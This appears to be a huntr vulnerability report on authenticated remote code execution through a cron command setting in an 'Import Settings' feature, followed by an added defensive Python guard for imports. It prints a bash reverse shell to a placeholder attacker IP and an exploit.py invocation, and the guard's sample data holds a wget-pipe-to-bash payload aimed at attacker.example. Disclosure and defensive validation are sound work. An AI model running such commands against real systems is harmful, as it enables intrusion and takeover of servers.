huntr report B29CF038-06F1-4FB0-9437-08F2991F92A8 (blakduk)
History: Feb 04, 2023 - 8:49 a.m.

Remote Code Execution in "Import Settings" feature

2023-02-04 08:49:41
blakduk
www.huntr.dev
9
improper data validation
crafted settings
authenticated attack
reverse shell
exploit
poc video
bug bounty

EPSS: 0.001 (Low), Percentile: 39.6%

Description

Due to improper data validation in the “Import Settings” feature, an authenticated attacker can send crafted settings that carry a malicious payload in the “system.croncmdline” value; because that value is a command line executed by the system, the attacker obtains remote code execution.

Steps to reproduce

Requirement: PHP code must be executed on the attacker machine.

  • Step 1: The attacker runs a web server and serves a file foo.txt. The content of this file is a reverse shell back to the attacker machine, for example:
#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
  • Step 2: Run exploit.py with the arguments it requires (target, credentials of the authenticated account, the attacker web server that hosts foo.txt, and the port the attacker is listening on):
python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}
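The root cause above is that an import blob may rewrite a setting whose value the system later executes. The following is an added defensive example, not code from the report, from exploit.py, or from the affected project: an import handler that drops executable keys such as system.croncmdline by default and, when an operator explicitly opts in, accepts only a command line that starts with an allowlisted interpreter and contains no shell metacharacters. The key set, the allowlist, the JSON settings format and the sample blobs are assumptions constructed for illustration.

```python
"""Import-settings guard: refuses to let an imported settings blob overwrite
keys whose value the system executes, such as system.croncmdline.
Added example; the key names, allowlist and JSON format are assumptions."""
import json
import re
import shlex

# Keys whose value is handed to the OS for execution. An import blob must not
# be able to rewrite these freely. The only name taken from the report is
# "system.croncmdline"; treat the set itself as an assumption.
EXEC_KEYS = {"system.croncmdline"}

# Interpreters a cron command line may start with (hypothetical allowlist).
ALLOWED_BINARIES = {"/usr/bin/php", "/usr/local/bin/php"}

# Anything that could chain a second command, substitute, or redirect I/O.
_SHELL_META = re.compile(r"[;&|`$<>(){}\r\n]")


def check_exec_value(key, value):
    """Return None if value is an acceptable command line for an executable
    key, otherwise a short reason string explaining the rejection."""
    if not isinstance(value, str) or not value.strip():
        return f"{key}: must be a non-empty string"
    if _SHELL_META.search(value):
        return f"{key}: shell metacharacters are not allowed"
    try:
        argv = shlex.split(value)
    except ValueError as exc:  # unbalanced quotes
        return f"{key}: unparsable command line ({exc})"
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return f"{key}: interpreter must be one of {sorted(ALLOWED_BINARIES)}"
    return None


def import_settings(current, blob, allow_exec_keys=False):
    """Merge a JSON settings blob into `current` and return (merged, rejected).

    Executable keys are dropped unless the caller explicitly opts in with
    allow_exec_keys (e.g. an admin-only path); even then the value must pass
    check_exec_value or the whole import is refused."""
    incoming = json.loads(blob)
    if not isinstance(incoming, dict):
        raise ValueError("settings blob must be a JSON object")
    merged = dict(current)
    rejected = []
    for key, value in incoming.items():
        if key in EXEC_KEYS:
            if not allow_exec_keys:
                rejected.append(key)
                continue
            reason = check_exec_value(key, value)
            if reason is not None:
                raise ValueError(f"import refused: {reason}")
        merged[key] = value
    return merged, rejected


# Constructed sample data (not taken from the report).
CURRENT_SETTINGS = {"site.name": "demo", "system.croncmdline": "/usr/bin/php cron.php"}
BENIGN_IMPORT = json.dumps({"site.name": "renamed", "mail.from": "noreply@example.test"})
# A blob that tries to turn the cron command into a remote fetch-and-run.
HOSTILE_IMPORT = json.dumps({
    "site.name": "renamed",
    "system.croncmdline": "wget -qO- http://attacker.example/foo.txt | bash",
})

if __name__ == "__main__":
    merged, rejected = import_settings(CURRENT_SETTINGS, HOSTILE_IMPORT)
    print("dropped keys:", rejected)  # ['system.croncmdline']
    print("cron command kept:", merged["system.croncmdline"])
    try:
        import_settings(CURRENT_SETTINGS, HOSTILE_IMPORT, allow_exec_keys=True)
    except ValueError as exc:
        print("opt-in path:", exc)
```

Dropping the key rather than validating it is the default because an import is the least trusted way a setting can arrive; the opt-in path shows the additional check needed if the product genuinely has to accept a cron command line from a file.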

Proof of Concept

